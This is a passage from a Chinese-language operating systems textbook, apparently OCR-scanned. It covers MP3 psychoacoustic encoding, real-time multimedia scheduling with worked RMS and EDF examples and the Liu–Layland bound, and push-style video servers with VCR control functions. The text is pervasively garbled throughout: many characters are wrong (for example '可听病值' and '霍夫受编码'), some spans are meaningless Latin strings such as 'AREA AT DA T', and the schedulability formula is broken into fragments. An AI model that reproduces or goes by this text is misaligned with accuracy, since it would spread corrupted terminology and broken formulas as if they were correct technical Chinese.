忽略 掉 ， 而 且 不 会 感觉 到 声音 质量 的 损失 ， 因 为 在 100Hz 处 20dB 是 低 于 


可 听 水 平 的 。 
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图 7-12 a) 作 为 频率 函数 的 可 听 病 值 ，b) 屏 蔽 效应 


现在 考虑 实验 2。 计 算 机 再 次 运行 实验 1， 但 是 这 次 却 一 有 个 大 约 
150 殖 北 的 等 幅 正 弦 波 从 加 在 实验 频率 上 。 我 们 发 现 ， 在 150Hz 频 率 附 
近 的 可 听 阐 值 上 升 了 ， 如 图 7-12b 所 示 。 

这 一 新 实验 的 结 末 表明 : 通过 跟踪 那些 被 附近 频段 能 量 更 强 的 信 
号 所 屏蔽 的 信号 ， 可 以 省 略 越 来 越 多 的 编码 信号 中 的 频率 ， 以 此 来 和 
约 二 进 制 位 。 在 图 7-12 中 ，125Hz 信 号 的 输出 是 可 以 完全 忽略 挥 的 ， 并 


且 没有 人 能 够 听 出 其 中 的 不 同 。 甚 至 当 某 个 频段 中 的 一 个 强大 信号 停 
止 后 ， 出 于 对 午时 屏蔽 这 一 知识 的 了 解 ， 也 会 让 我 们 在 耳 厅 恢复 期 的 
时 间 段 内 省 略 掉 那 些 被 屏蔽 的 频率 。MP3 编 码 的 实质 台 是 对 声音 做 传 
立 叶 变换 从 而 得 到 每 个 频率 的 能 量 ， 之 后 只 传递 那些 不 被 屏蔽 掉 的 频 
率 ， 并 且 用 尽 可 能 少 的 二 进 制 位 数 来 编码 这 些 频 率 。 


有 了 这 些 信 息 作为 背景 ， 现 在 来 考察 有 关 编 码 是 如 何 完 成 的 。 通 
过 抽取 32kHz、44.1kHz 或 者 48 kHz 的 波形 ， 完 成 声音 压缩 。 第 一 个 和 
最 后 一 个 都 是 四 售 五 入 的 整数 。44.1kHz 是 用 于 Audio CD 的 ， 因 为 这 个 
值 能 很 好 地 捕获 人 耳 可 听 到 的 所 有 音频 信息 。 可 以 在 以 下 四 个 配置 中 
任 选 一 个 ， 用 一 或 两 个 通道 完成 抽样 : 


1) 单 声 道 (一 个 输入 流 ) 。 


2) 双 声 道 例如， 一 个 英语 的 和 一 个 日 语 的 音 轨 ) 。 


3) 分 立 立 体 声 (每 个 通道 分 开 压 缩 ) ° 
4) 联 合 立体 声 (完全 利用 通道 间 的 见 余 ) 。 


首先 ， 选 择 输出 的 比特 率 。MP3 可 以 将 摇 深 CD 的 立体 声 降低 到 
96kbps， 并 且 在 质量 上 几乎 没有 任何 失真 ， 甚 至 连 择 滚 迷 都 听 不 出 差 
别 。 而 对 于 一 场 钢琴 音乐 会 ， 至 少 需 要 128kbps。 造 成 这 样 不 同 的 原因 


征 因 为 播 深 的 信 噪 比 要 比 一 场 钢琴 音乐 会 要 高 得 多 (至 少 从 工程 角度 
上 看 ) 。 也 可 以 选择 稍 低 一 点 的 输出 比率 ， 接 受 质 量 上 的 少许 失真 。 


然后 将 这 些 样本 处 理 成 1152 (大 概 26ms) 的 一 些 组 ， 每 组 首先 通 
过 32 个 数字 滤波 器 ， 获 得 32 个 频率 波段 。 同 时 ， 将 输入 放 进 一 个 心理 
声学 的 模型 中 ， 测 定 被 屏蔽 的 频率 。 接 下 来 ， 进 一 步 转换 32 频 率 波 段 
中 的 每 一 个 ， 以 提供 一 个 更 精确 的 频谱 解决 方案 。 


接着 ， 将 现 有 的 二 进 制 位 分 配 到 各 个 波段 中 ， 大 部 分 二 进 制 位 分 
配给 拥有 多 数 频 谱 能 量 的 未 屏蔽 波段 ， 小 部 分 二 进 制 位 分 配给 拥有 较 
少 频 谱 能 量 的 未 屏蔽 波段 ， 已 屏蔽 的 波段 不 分 配 二 进 制 位 。 最 后 ， 用 
霍 夫 受 编码 来 对 这 些 二 进 制 位 进行 编码 ， 它 可 以 将 经 党 出 现 的 数字 赋 
予 较 短 的 代码 ， 而 对 不 常 出 现 的 数字 赋予 较 长 的 代码 。 


实际 的 工作 过 程 更 复杂 。 为 了 城 


少 噪音 ， 消 除 混 消 ， 以 及 利用 通 
道 间 了 见 余 ， 需 要 各 种 各 样 的 技术 ， 不 过 这 些 


内 容 超出 了 本 书 的 范围 。 


7.5 多 媒体 进程 调度 


文 持 多 媒体 的 操作 系统 与 传统 的 操作 系统 在 三 个 主要 的 方面 有 所 
区 别 : 进程 调度 、 文 件 系 统 和 伍 副 调度 。 本 下 中 我 们 开始 讨论 进程 调 
度 ， 在 后 面 的 各 市 中 接着 讨论 其 他 主题 。 


7.5.1 ”调度 同 质 进程 


最 简单 的 一 种 视频 服务 器 可 以 文 持 显示 固定 数目 的 电影 ， 所 有 电 
影 使 用 相同 的 帧 率 、 视 频 分 辨 率 、 数 据 率 以 及 其 他 参数 。 在 这 样 的 情 
况 下 ， 可 以 采用 下 述 简单 但 是 有 效 的 调度 算法 。 对 每 一 部 电影 ， 存 在 
一 个 进程 〈 或 线程 ) ， 其 工作 是 每 次 从 磁 强 中 读 取 电影 的 一 帧 然后 将 
该 帧 传送 给 用 户 。 由 于 所 有 的 进程 同等 重要 ， 每 一 帧 有 相同 的 工作 量 
要 做 ， 并 且 当 它们 完成 当前 帧 的 处 理 时 将 阻塞 ， 所 以 采用 轮转 调度 可 
以 很 好 地 做 这 样 的 工作 。 将 调度 算法 标准 化 的 惟一 的 额外 要 求 是 定时 
机 制 ， 以 确保 每 一 进程 以 恰当 的 频率 运行 。 


实现 适当 定时 的 一 种 方式 是 有 一 个 主 控 时 钟 ， 该 时 钟 每 秒 滴 管 适 
当 的 次 数 ， 例 如 针对 NTSC 制 式 ， 每 秒 滴答 30 次 。 在 时 钟 的 每 一 滴 
答 ， 所 有 的 进程 以 相同 的 次 序 相继 运行 。 当 一 个 进程 完成 其 工作 时 ， 
它 将 发 出 suspend 系 统 调用 释放 CPU 直到 主 控 时 钟 再 次 滴答 。 当 主 控 时 


钟 再 次 滴 管 时， 所 有 的 进程 再 次 以 相同 的 次 序 运行 。 只 要 进程 数 足够 
所 有 的 工作 都 可 以 在 一 帧 的 时 间 内 完成 ， 采 用 轮转 调度 殉 足 够 
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7.5.2 ”一 般 实时 调度 


不 笠 的 是 ， 这 一 模型 在 实践 中 几乎 没有 什么 用 处 。 随 看 观众 的 来 
来 去 去 ， 用 户 的 数目 不 断 发 生变 化 ， 由 于 视频 压缩 的 本 性 EP 
XBW AGE) ， 帧 的 大 小 剧烈 变化 ， 并 且 不 同 的 电影 可 能 有 不 同 的 分 
辩 率 。 因 此 ， 不 同 的 进程 可 能 必须 以 不 同 的 频率 运行 ， 具 有 不 同 的 工 
作 量 ， 并 且 具 有 不 同 的 最 终 时 限 (在 此 之 前 所 有 工作 必须 完成 ) 。 


这 些 考虑 导致 一 个 不 同 的 模型 : 多 个 进程 竞争 CPU ， 每 个 进程 有 
目 己 的 工作 量 和 最 终 时 限 。 在 下 面 的 模型 中 ， 我 们 将 假设 系统 知道 每 
个 进程 必须 以 什么 样 的 频率 运行 、 有 多 少 工作 要 做 以 及 下 一 个 最 终 时 
限 是 什么 。 《磁盘 调度 也 是 一 个 问题 ， 但 我 们 将 在 后 面 考虑 。) 多 个 
相互 竞争 的 进程 ， 其 中 者 干 进程 或 全 部 进程 具有 必须 满足 的 最 终 时 限 
的 调度 称 为 实时 调度 (real-time scheduling) ° 


作为 实时 多 媒体 调度 程序 工作 环境 的 一 个 例子 ， 我 们 考虑 三 个 进 
程 A、B 和 C， 如 图 7-13 所 示 。 进 程 A 每 30ms 运 行 一 次 (近似 NTSC 制 式 
速度 ) ， 每 一 帧 需要 10ms 的 CPU 时 间 。 在 不 存在 竞争 的 情况 下 ， 进 程 A 
将 在 突 发 A1、A2、A3 等 中 运行 ， 每 一 突 发 在 前 一 突 发 的 30ms 之 后 开 
始 。 每 个 CPU 突 发 处 理 一 帧 并 且 具 有 一 个 最 终 时 限 : 它 必须 在 下 一 个 


突 发 开始 之 前 完成 
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图 7-13 三 个 周期 性 的 进程 ， 每 个 进程 播放 一 部 电影 ， 每 一 电影 的 帧 
率 以 及 每 帧 的 处 理 需 求 有 所 不 同 


图 7-13 中 还 有 另外 两 个 进程 : B 和 C。 进 程 B 每 秒 运行 25 次 (例如 
PAL 制 式 ) ， 进 程 C 每 秒 运 行 20 次 (例如 一 个 慢 下 来 的 NTSC 或 PAL 流 ， 
意 在 使 一 个 低 带 宽 的 用 户 连 接 到 视频 服务 器 ) 。 每 一 帧 的 计算 时 间 如 
图 7-13 中 所 示 ， 进 程 B 为 15ms， 进 程 C 为 5ms， 没 有 使 它们 都 具有 相同 


的 时 间 只 是 为 了 使 调度 问题 更 加 一 般 化 。 


现在 调度 问题 是 如 何 调度 A、B 和 C 以 确保 它们 满足 各 目的 最 终 时 
限 。 在 寻找 调度 算法 之 前 ， 我 们 必须 看 一 看 这 一 组 进程 究竟 是 不 是 可 
调度 的 。 回 想 2.4.4 节 ， 如 果 进 程 1 具有 P; ms 的 周期 并 且 需 要 Ci ms 的 CPU 
时 间 ， 那 么 系统 是 可 调度 的 当 且 仅 当 


G <1 
P 


Ms 


| 
— 


其 中 m 是 进程 数 ， 在 本 例 中 ，m=3。 注 意 ，C; /P; 只 是 CPU 被 进程 i 
使 用 的 部 分 。 束 图 7-13 所 示 的 例子 而 言 ， 进 程 A 用 掉 CPU 的 10/30， 进 程 
B 用 掉 CPU 的 15/40， 进 程 C 用 掉 CPU 的 5/50。 将 这 些 分 数 加 在 一 起 为 
CPU 的 0.808， 所 以 该 系统 是 可 调度 的 。 


到 目前 为 止 我 们 假设 每 个 影片 流 有 一 个 进程 ， 实 际 上 ， 每 个 影片 
流 可 能 有 两 个 (或 更 多 个 ) 进程 ， 例 如 ， 一 个 用 于 音频 ， 一 个 用 于 视 
频 。 它 们 可 能 以 不 同 的 速率 运行 并 且 每 一 脉冲 可 能 消耗 不 同 数 量 的 
CPU 时 间 。 人 然而 ， 将 音频 进程 加 入 到 系统 中 并 没有 改变 一 般 模型 ， 因 
为 我 们 的 全 部 假设 是 存在 mm 个 进程 ， 每 个 进程 以 一 个 固定 的 频率 运行 ， 
对 每 一 CPU 突 发 有 固定 的 工作 量 要 求 。 


~ 


在 某 些 实时 系统 中 ， 进 程 是 可 抢占 的 ， 在 其 他 的 系统 中 ， 进 程 是 
不 可 抢占 的 。 在 多 媒体 系统 中 ， 进 程 通 常 是 可 抢占 的 ， 这 意味 着 允许 
有 人 危险 错过 其 最 终 时 限 的 进程 在 正在 运行 的 进程 完成 工作 以 前 将 其 中 
断 ， 然 后 当 它 完成 工作 之 后 ， 被 中 断 的 前 一 个 进程 再 继续 运行 。 这 一 
行为 只 不 过 是 多 道 程序 设计 ， 正 如 我 们 在 前 面 已 经 看 过 的 。 我 们 要 研 
完 的 是 可 抢占 的 实时 调度 算法 ， 因 为 在 多 媒体 系统 中 没有 拒绝 它们 的 
理由 并 且 它们 比 不 可 抢占 的 调度 算法 具有 更 好 的 性 能 。 惟 一 要 关心 的 
征 如 采 传 输 缓冲 区 在 很 少 的 儿 个 突 发 中 衫 填充 ， 那 么 在 最 终 时 限 到 来 
之 前 该 缓冲 区 应 该 是 完全 满 的 ， 这 样 它 天 可 以 在 一 次 操作 中 传递 给 用 
F, AURAS 
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个 进程 一 个 固定 的 优先 级 ， 然 后 使 用 这 些 优先 级 做 基于 优先 级 的 抢占 
调度 。 动 态 算 法 没有 固定 的 优先 级 。 下 面 我 们 将 研究 每 种 类 型 的 一 个 
PIF ° 


7.5.3 ”速率 单调 调度 


适用 于 可 抢占 的 周期 性 进程 的 经 典 静 态 实 时 调度 算法 是 速率 单调 
调度 (Rate Monotonic Scheduling, RMS) (Liu 和 Layland,1973) ° © 
可 以 用 于 满足 下 列 条 件 的 进程 : 


1) 每 个 周期 性 进程 必须 在 其 周期 内 完成 。 


2) 没 有 进程 依赖 于 任何 其 他 进程 。 


3) 每 一 进程 在 一 次 突 发 中 需要 相同 的 CPU 时 间 量 。 
4) 任 何 非 周 期 性 进程 都 没有 最 终 时 限 。 
5) 进 程 抢 占 即 刻 发 生 而 没有 系统 开销 。 


前 四 个 条 件 是 合理 的 。 当 然 ， 最 后 一 个 不 是 ， 但 古 该 条 件 使 系统 
建 模 更 加 容易 。RMS 分 配给 每 个 进程 一 个 固定 的 优先 级 ， 优 移 级 等 于 
进程 触发 事件 发 生 的 频率 。 例 如 ， 必 须 每 30ms 运 行 一 次 (每 秒 33 次 ) 
的 进程 获得 的 优先 级 为 33， 必 须 每 40ms 运 行 一 次 (每 秒 25 次 ) 的 进程 
获得 的 优先 级 为 25， 必 须 每 50ms 运 行 一 次 (每 秒 20 次 ) 的 进程 获得 的 
优先 级 为 20。 所 以 ， 优 先 级 与 进程 的 速率 (每 秒 运行 进程 的 次 数 ) 成 
线性 关系 ， 这 正 是 为 什么 将 其 称 为 速率 单调 的 原因 。 在 运行 时 ， 调 度 
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程 。Liu 和 Layland 证 明了 在 静态 调度 算法 种 类 中 RMS 十 最 优 的 。 


图 7-14 演 示 了 在 图 7-13 所 示 的 例子 中 速率 单调 调度 是 如 何 工作 的 。 
进程 A、B 和 C 分 别 具 有 静态 优先 级 33、25 和 20， 这 意味 着 只 要 A 需 要 运 
行 ， 它 就 可 以 运行 ， 抢 占 任 何 当前 正在 使 用 CPU 的 其 他 进程 。 进 程 B 可 
以 抢占 C， 但 不 能 抢占 A。 进 程 C 必 须 等 待 直 到 CPU 空闲 才能 运行 。 


时 间 (ms) 一 一 


图 7-14 RMS 和 EDF 实 时 调度 的 一 个 例子 


在 图 7-14 中 ， 最 初 所 有 三 个 进程 都 就 绪 要 运行 ， 优 先 级 最 高 的 进程 
A 被 选中 ， 并 准许 它 运行 直到 它 在 10ms 时 完成 ， 如 图 7-14 中 的 RMS 一 行 
所 示 。 在 进程 A 完成 之 后 ， 进 程 B 和 C 以 先后 次 序 运 行 。 合 起 来 ， 这 些 
进程 花费 了 30ms 的 时 间 运 行 ， 所 以 当 C 完 成 的 时 候 ， 正 是 该 A 再 次 运行 
的 时 候 。 这 一 轮换 持续 进行 直到 t=70 时 系统 变 为 空间 。 


在 t=80 时 ， 进 程 B 束 绪 并 开始 运行 。 然 而 ， 在 t=90 时 ， 优 先 级 更 高 
的 进程 A 变 为 就 绪 ， 所 以 它 抢 占 B 并 运行 ， 直 到 在 全 100 时 完成 。 在 这 一 
时 刻 ， 系 统 可 以 在 结束 进程 B 或 者 开始 进程 C 之 间 进 行 选择 ， 所 以 它 选 
择优 先 级 最 高 的 进程 B。 


7.5.4 ”最 早 最 终 时 限 优先 调度 


男 一 个 流行 的 实时 调度 算法 是 最 早 最 终 时 限 优 先 (Earliest 
Deadline First, EDF) 算法 。EDF 是 一 个 动态 算法 ， 它 不 像 速率 单调 算 
法 那样 要 求 进程 是 周期 性 的 。 它 也 不 像 RMS 那 样 要求 每 个 CPU 突 发 有 
相同 的 运行 时 间 。 只 要 一 个 进程 需要 CPU 时 间 ， 它 就 宣布 它 的 到 来 和 
最 终 时 限 。 调 度 程 序 维持 一 个 可 运行 进程 的 列表 ， 该 列表 按 最 终 时 限 
排序 。EDF 算 法 运行 列表 中 的 第 一 个 进程 ， 也 就 是 具有 最 近 最 终 时 限 
的 进程 。 当 一 个 新 的 进程 就 绪 时 ， 系 统 进 行 检 查 以 了 解 其 最 终 时 限 是 
否 发 生 在 当前 运行 的 进程 结束 之 前 。 如 果 是 这 样 ， 新 的 进程 就 抢占 当 
前 正在 运行 的 进程 。 


图 7-14 给 出 了 EDF 的 一 个 例子 。 最 初 所 有 三 个 进程 都 是 就 绪 的 ， 它 
们 按 其 最 终 时 限 的 次 序 运行 。 进 程 A 必 须 在 t=30 之 前 结束 ，B 必 须 在 
t=40 之 前 结束 ，C 必 须 在 t=50 之 前 结束 ， 所 以 A 具有 最 早 的 最 终 时 限 并 
因此 而 先 运行 。 直 到 t=90， 选 择 都 与 RMS 相 同 。 在 t=90 时 ，A 表 次 整 
绪 ， 并 且 其 最 终 时 限 为 t=120， 与 B 的 最 终 时 限 相同 。 调 度 程序 可 以 合 
理 地 选择 其 中 任何 一 个 运行 ， 但 是 由 于 抢占 B 具 有 某 些 非 零 的 代价 与 之 
相 联系 ， 所 以 最 好 是 让 B 继 续 运 行 ， 而 不 去 承担 切换 的 代价 。 


为 了 消除 RMS 和 EDF 总 是 给 出 相同 结 来 的 想法 ， 现 在 让 我 们 看 一 
看 男 外 一 个 例子 ， 如 图 7-15 所 示 。 在 这 个 例子 中 ， 进 程 A、B 和 C 的 周 


期 与 前 面 的 例子 相同 ， 但 是 现在 A 每 次 突 发 需要 15ms 的 CPU 时 间 ， 而 不 
是 只 有 10ms。 可 调度 性 测试 计算 CPU 的 利用 率 为 

0.500+0.375+0.100=0.975。CPU 只 留 下 了 2.5%， 但 是 在 理论 上 CPU 并 没 
有 被 超额 预定 ， 找 到 一 个 合理 的 调度 应 该 是 可 有 
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图 7-15 以 RMS 和 EDF 进 行 实时 调度 的 另 一 个 例子 


对 于 RMS， 三 个 进程 的 优先 级 仍 为 33、25 和 20， 因 为 优先 级 只 与 
周期 有 关系 ， 而 与 运行 时 间 没 有 关系 。 这 一 次 ， 进 程 B 直 到 t=30 才 结 
束 ， 在 这 一 时 刻 ， 进 程 A 再 次 殉 绪 要 运行 。 等 到 A 结 束 时 ，t=45， 此 时 
B 再 次 就 绪 ， 由 于 它 的 优先 级 高 于 C， 所 以 B 运 行 而 C 则 错过 了 其 最 终 时 
限 。RMS 失 败 。 


现在 看 一 看 EDF 如 何 处 理 这 种 情况 。 当 t30 时 ， 在 A2 和 C1 之 间 存 
在 竞争 。 因 为 C1 的 最 终 时 限 是 50， 而 A2 的 最 终 时 限 是 60， 所 以 C 被 调 
度 。 这 就 不 同 于 RMS， 在 RMS 中 A 由 于 较 高 的 优先 级 而 成 为 赢家 。 


当 t=90 时 ，A 第 四 次 束 绪 。A 的 最 终 时 限 与 当前 进程 相同 ( 同 为 
120) ， 所 以 调度 程序 面临 抢占 与 否 的 选择 。 如 前 所 述 ， 如 果 不 是 必要 
最 好 不 要 抢占 ， 所 以 B3 被 允许 完成 。 


在 图 7-15 所 示 的 例子 中 ， 直 到 t=150，CPU 都 是 100% 被 占用 的 。 然 
而 ， 因 为 CPU 只 有 97.5% 被 利用 ， 所 以 最 终 将 会 出 现 则 际 。 由 于 所 有 开 
台 和 结束 时 间 都 是 sms 的 倍数 ， 所 以 间 孙 将 是 5ms。 为 了 获得 要 求 的 
2.5% 的 空 亲 时 间 ，5ms 的 间 隐 必须 每 200ms 出 现 一 次 ， 这 就 是 间隙 为 什 
么 没有 在 图 7-15 中 出 现 的 原因 。 


一 个 有 趣 的 问题 是 RMS 为 什么 会 失败 。 根 本 上 ， 使 用 静态 优 移 级 
只 有 在 CPU 的 利用 率 不 太 高 的 时 候 才 能 工作 。Liu 和 Layland (1973) 证 
明了 对 于 任何 周期 性 进程 系统 ， 如 果 
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那么 就 可 以 保证 RMS 工 作 。 对 于 m=3、4、5、10、20 和 100， 最 大 
允许 利用 率 为 0.780、0.757、0.743、0.718、0.705 和 0.696。 随 着 
m-~oo， 最 大 利用 率 有 逼近 ln 2。 换 句 话说 ，Liu 和 Layland 证 明了 ， 对 于 三 
个 进程 ， 如 条 CPU 利用 率 等 于 或 小 于 0.780， 那 么 RMS 总 是 可 以 工作 
的 。 在 第 一 个 例子 中 ，CPU 利 用 率 为 0.808 而 RMS 工 作 正常 ， 但 那 只 不 
过 是 幸运 喷 了 。 对 于 不 同 的 周期 和 运行 时 间 ， 利 用 率 为 0.808 很 可 能 会 


失败 。 在 第 二 个 例子 中 ，CPU 利 用 率 如 此 之 高 (0.975) ， 根 本 不 存在 
RMS 能 够 工作 的 希望 。 


与 此 相对 照 ，EDF 对 于 任意 一 组 可 调度 的 进程 总 是 可 以 工作 的 ， 
它 可 以 达到 100% 的 CPU 利用 率 ， 付 出 的 代价 是 更 为 复杂 的 算法 。 
而 ， 在 一 个 实际 的 视频 服务 器 中 ， 如 果 CPU 利 用 率 低 于 RMS 限 度 ， 可 
以 使 用 RMS， 否 则 ， 应 该 选择 EDF 。 


7.6 多 媒体 文件 系统 范 型 


至 此 我 们 已 经 讨论 了 多 媒体 系统 中 的 进程 调度 ， 下 面 继 续 我 们 的 
人 研究， 看 一 看 多 媒体 文件 系统 。 这 样 的 文件 系统 使 用 了 与 传统 文件 系 
统 不 同 的 范 型 。 我 们 首先 回顾 传统 的 文件 W/O， 然后 将 注意 力 转向 多 媒 
体 文件 服务 紫 是 如 何 组 织 的 。 进 程 要 访问 一 个 文件 时 ， 前 先 要 发 出 
open 系 统 调 用 。 如 采 该 调用 成 功 ， 则 调用 者 补给 予 示 种 令 牌 以 便 在 未 
来 的 调用 中 使 用 ， 该 令 牌 在 UNIX 中 被 称 为 文件 描述 符 ， 在 Windows 中 
被 称 为 句柄 。 这 时 ， 进 程 可 以 发 出 read 系 统 调用 ， 提 供 令 牌 、 缓 冲 区 地 
址 和 学 市 计数 作为 参数 。 操 作 系 统 则 在 缓冲 区 中 返回 请 求 的 数据 。 以 
后 还 可 以 发 出 男 外 的 read 调 用 ， 直 到 进程 结束 ， 在 进程 结束 时 它 将 调用 
close 以 关闭 文件 并 返回 其 俯 源 。 


由 于 实时 行为 的 需要 ， 这 一 模型 对 于 多 媒体 并 不 能 很 好 地 工作 。 
在 显示 来 自 远程 视频 服务 器 的 多 媒体 文件 时 ， 该 模型 的 工作 尤为 拙 
务 。 第 一 个 问题 是 用 户 必 须 以 相当 精确 的 时 间 间 隔 进 行 read 调 用 。 第 二 
个 问题 是 视频 服务 絮 必 须 能 够 没有 延迟 地 提供 数据 块 ， 当 请 求 没 有 计 
划 地 到 来 并 且 预 先 没 有 保留 资源 时 ， 做 到 这 一 点 是 十 分 困难 的 。 

为 解决 这 些 问题 ， 多 媒体 文件 服务 闫 使 用 了 一 个 完全 不 同 的 苑 


AY: 像 录 像 机 (Video Cassette Recorder, VCR) 一 样 工作 。 为 了 读 取 
一 个 多 媒体 文件 ， 用 户 进程 发 出 start 系 统 调 用 ， 指 定 要 读 的 文件 和 各 种 


其 他 参数 ， 例 如 ， 要 使 用 哪些 音频 和 字幕 轨迹 。 接 着 ， 视 频 服 务 器 开 
始 以 必要 的 速率 送出 帧 。 然 后 用 户 进程 以 帧 进来 的 速率 对 它们 进行 处 
理 。 如 果 用 户 对 所 看 的 电影 感到 厌烦 ， 那 么 发 出 stop 系 统 调 用 可 以 将 数 
据 流 终止 。 有 具有 这 种 数据 流 模型 的 文件 服务 器 通常 被 称 为 推送 型 服务 
器 (push server) ， 因 为 它 将 数据 推送 给 用 户 ; 与 此 相对 照 的 是 传统 的 
拉 取 型 服务 器 (pullserver) ， 用 户 不 得 不 通过 重复 地 调用 read 一 块 接 
一 块 地 取得 数据 ， 每 调用 一 次 可 以 拉 取 出 一 块 数据 。 这 两 个 模型 之 间 
的 区 别 如 图 7-16 所 示 。 
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7.6.1 VCR 控 制 功能 


大 多 数 视 频 服务 器 也 实现 了 标准 的 VCR 挥 制 功能 ， 包 括 和 暂停、 快 
进 和 倒 带 。 暂 集 是 相当 简单 的 。 用 户 发 送 一 个 消息 给 视频 服务 右 ， 告 
诉 它 停止 。 视 频 服务 器 此 时 要 做 的 全 部 事情 是 记 住 下 一 次 要 送出 的 是 
哪 一 巾 。 当 用 户 要 求 服务 器 恢复 播放 时 ， 服 务 器 只 要 从 它 停止 的 地 方 
AREA AT DA T ° 


然而 ， 这 里 存在 着 一 个 复杂 因素 。 为 了 获得 可 接受 的 性 能 ， 服 务 
绥 应 该 为 每 个 流出 的 数据 流 保留 诸如 磁 表 市 宽 和 内 存 缓冲 区 等 货源 。 
当 电 影 暂停 时 继续 占用 这 些 资 源 将 造成 浪费 ， 特 别 是 如 果 用 户 打 算 到 
厨房 中 找到 一 块 冷冻 的 比萨 饼 (或 许 是 特大 号 的 ) 、 用 微波 炉 毫 调 并 
且 类 和 餐 一 顿 的 时 候 。 当然 ， 在 暂停 的 时 候 可 以 很 容易 地 将 资源 释放 ， 
但 是 这 引入 了 风险 : 当 用 户 试 图 恢复 播放 的 时 候 ， 有 可 能 无 法 重新 获 
上 


得 这 些 资源 。 


真正 的 倒 市 实际 上 非常 简单 ， 没 有 任何 复杂 性 。 服 务 瑚 要 做 的 全 
部 事情 是 注意 到 下 一 次 要 送出 的 帧 是 第 0 帧 。 还 有 比 这 更 容易 的 吗 ? 然 
m, REAREA (也 就 是 在 倒 带 的 同时 播放 ) 就 难处 理 多 了 “。 如 果 没 
有 上 压缩 ， 那 么 以 10 倍 的 速度 前 进 的 一 种 方法 是 每 10 帧 只 显示 一 帧 ， 以 
20 倍 的 速度 前 进 则 要 求 每 20 帧 显示 一 帧 。 实 际 上 ， 在 不 存在 压缩 的 情 
况 下 ， 以 任意 速度 前 进 和 后 退 都 是 十 分 容易 的 。 要 以 正常 速度 的 k 倍 运 
行 ， 只 要 每 k 帧 显示 一 帧 束 可 以 了 。 要 以 正常 速度 的 k 倍 后 退 ， 只 要 党 


男 一 个 方 辐 做 相同 的 事情 束 可 以 了 。 这 一 方法 在 推送 型 服务 占 和 拉 取 
型 服务 器 上 工作 得 同样 好 。 


压缩 则 使 快 进 和 快 倒 复杂 起 来 。 对 于 便携 式 摄像 机 的 DV 人 磁 市 ， 由 
于 其 每 一 帧 都 是 独立 于 其 他 帧 而 压缩 的 ， 所 以 只 要 能 够 快速 地 找到 所 
需要 的 帧 ， 使 用 这 一 策略 还 是 有 可 能 的 。 由 于 视 其 内 容 不 同 每 一 帧 的 
压缩 量 也 有 所 不 同 ， 所 以 每 一 帧 具有 不 同 的 大 小 ， 因 而 在 文件 中 辐 前 
跳 过 k 帧 并 不 能 通过 数字 计算 来 完成 。 此 外 ， 首 频 压缩 是 独立 于 视频 压 
缩 的 ， 所 以 对 于 在 高 速 模式 中 显示 的 每 一 视频 帧 ， 还 必须 找到 正确 的 
音频 帧 (除非 在 高 于 正常 速度 播放 时 将 声音 关闭 ) 。 因 此 ， 对 一 个 DV 
文件 进行 快 进 操作 需要 有 一 个 索引 ， 该 索引 可 以 使 帧 的 查找 快速 地 实 
现 ， 但 是 至 少 在 理论 上 这 样 做 是 可 行 的 。 


对 于 MPEG， 由 于 使 用 I 帧 、P 帧 和 B 帧 ， 这 一 方案 即使 在 理论 上 也 
是 不 能 工作 的 。 同 前 跳 过 k 帧 《就 算 假设 能 这 样 做 ) 可 能 落 在 一 个 P 帧 
上 上 ， 而 这 个 P 帧 则 基于 刚刚 跳 过 的 一 个 帜 。 没 有 基本 帆 ， 只 有 从 基本 
帧 发 生 的 增 量变 化 (这 正 是 P 帧 所 包含 的 ) 是 无 用 的 。MPEG 要 求 按 顺 
序 播放 文件 。 


攻克 这 一 难题 的 男 一 个 方法 是 实际 尝试 以 10 倍 的 速度 顺序 地 播放 
文件 。 然 而 ， 这 样 做 束 要 求 以 10 倍 的 速度 将 数据 拉 出 磁盘 。 此 时 ， 服 
务 器 可 能 试图 将 帧 解压 缩 (这 是 正常 情况 下 服务 器 不 需要 做 的 事 
青 )， 判 定 需 要 哪 一 帧 ， 然 后 每 隔 10 帧 重新 压缩 成 一 个 I 帧 。 然 而 ， 
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月 


样 做 给 服务 右 增 加 了 沉重 的 人 负担。 这 一 方法 还 要 求 服务 器 了 解压 缩 格 
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作为 蔡 代 ， 可 以 通过 网 络 实际 发 送 所 有 的 数据 给 用 户 ， 并 在 用 户 
端 选 出 正确 的 帧 ， 这 样 做 就 要 求 网 络 以 10 倍 的 速度 运行 ， 这 或 许 是 可 
行 的 ， 但 是 在 这 么 高 的 速度 下 正常 操作 肯定 不 是 一 件 容易 的 事情 。 


总 而 襄 之 ， 不 存在 容易 的 方法 。 人 惟一 可 行 的 策略 要 求 预 完 规划 。 
可 以 做 的 事情 是 建立 一 个 特殊 的 文件 ， 包 含 每 隔 10 帧 中 的 一 帧 ， 并 且 
将 该 文件 以 通常 的 MPEG 算 法 进行 压缩 。 这 个 文件 正 古 在 图 7-3 中 注 
为 “ 快 进 ” 的 那个 文件 。 要 切换 到 快 进 模式 ， 服 务 占 必须 判定 在 快 进 文 
件 中 用 户 当前 所 在 的 位 置 。 例 如 ， 如 琳 当 前 帧 是 48 210 并 且 快 进 文 件 以 
10 倍 的 速度 运行 ， 那 么 服务 器 在 快 进 文件 中 必须 定位 到 4821 帧 并 且 在 
此 处 以 正常 速度 开始 播放 。 当 然 ， 这 一 帧 可 能 是 P 帧 或 B 巾 ， 但 十 客户 
端的 解码 进程 可 以 位 单 地 跳 过 硅 干 帧 直到 看 见 一 个 巾 。 利 用 符 别 准备 
的 快 倒 文 件 ， 可 以 用 类 似 的 方法 实现 快 倒 。 


当 用 户 切 换 回 到 正 溃 速度 时 ， 必 须 使 用 相反 的 技巧 。 如 有 果 在 快 进 
文件 中 当前 帧 是 5734， 服 务 胡 只 要 切换 回 到 常规 文件 并 且 从 57 340 帆 处 
继续 播放 。 同 样 ， 如 果 这 一 帧 不 古 一 个 1 帧 ， 和 客户 站 的 解码 进程 必须 名 
上 略 所 有 的 帆 直 到 看 见 一 个 I 帧 。 


尽管 有 了 这 两 个 额外 的 文件 可 以 做 这 些 工 作 ， 这 一 方案 还 是 有 某 
些 缺 点 。 首先， 需要 某 些 额外 的 磁盘 空间 来 存放 额外 的 文件 。 其 次 ， 
快 进 和 倒 带 只 能 以 对 应 于 特别 文件 的 速度 进行 。 第 三 ， 在 常规 文件 、 
快 进 文件 和 快 倒 文 件 之 间 来 回 切换 需要 额外 的 复杂 算法 。 


7.6.2 ”近似 视频 点 播 


有 k 个 用 户 取 得 相同 的 电影 和 这 些 用 户 取得 k 部 不 同 的 电影 在 本 质 
上 给 服务 亏 施 加 了 相同 的 工作 量 。 然 而 ， 通 过 对 模型 做 一 个 小 小 的 修 
